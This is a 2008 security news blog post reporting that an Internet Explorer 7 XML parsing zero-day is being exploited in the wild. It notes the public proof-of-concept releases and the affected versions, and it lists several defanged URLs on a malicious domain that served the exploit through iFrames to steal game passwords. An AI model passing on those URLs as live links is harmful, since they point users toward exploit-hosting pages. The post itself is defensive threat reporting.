December 10th, 2008

IE7 XML parsing zero day exploited in the wild

Posted by Dancho Danchev @ 5:57 pm

Categories: Anti Virus, Arbitrary Code Execution, Botnets, Browsers, Exploit code, Hackers, Malware, Microsoft, Patch Watch, Windows Vista, Zero-day attacks

Tags: Security, Internet Explorer 7, XML, Windows XP, Windows Vista, Dancho Danchev

A couple of hours ago, two working proof of concept exploits for MS Internet Explorer XML Parsing Remote Buffer Overflow were posted at Milw0rm, with international hacking communities quickly catching up and starting to use it. The second PoC also works on Vista, in particular both exploits were tested on Vista SP1, Explorer 7.0.6001.18000, Vista SP0 Explorer 7.0.6000.16386, and also on WinXP SP3, Explorer 7.0.5730.13.

And if that’s not enough, Microsoft is also investigating a second zero day affecting the WordPad text converter according to an advisory issued yesterday.

Not surprisingly, the IE7 exploit is already in circulation, with the Shadowserver Foundation keeping track of malicious domains using it, the majority of which still remain active. Despite the fact the in its current form the exploit code is easy to spot through generic detection for potentially malicious shellcode, sampling several of the domains using it reveals that the Chinese hackers using it are also taking advantage of several different client-side vulnerabilities in order to increase the chances of successful infection. Typical exploits structure looks like the following :

baidu .bbtu01. cn/c0x.htm
baidu. bbtu01. cn/ie07.htm
baidu. bbtu01. cn/104.htm
baidu. bbtu01. cn/a0s.htm
baidu. bbtu01. cn/c0e.htm
baidu. bbtu01. cn/lzz.htm
baidu. bbtu01. cn/Bf0yy.htm
baidu. bbtu01. cn/rea0l10.htm
baidu. bbtu01. cn/real11.htm

Despite that the malicious domains remain injected at legitimate Chinese sites and forums as iFrames only, this could easily change so that more legitimate international sites start getting targeted. What are they after this time? Passwords for popular online games in China.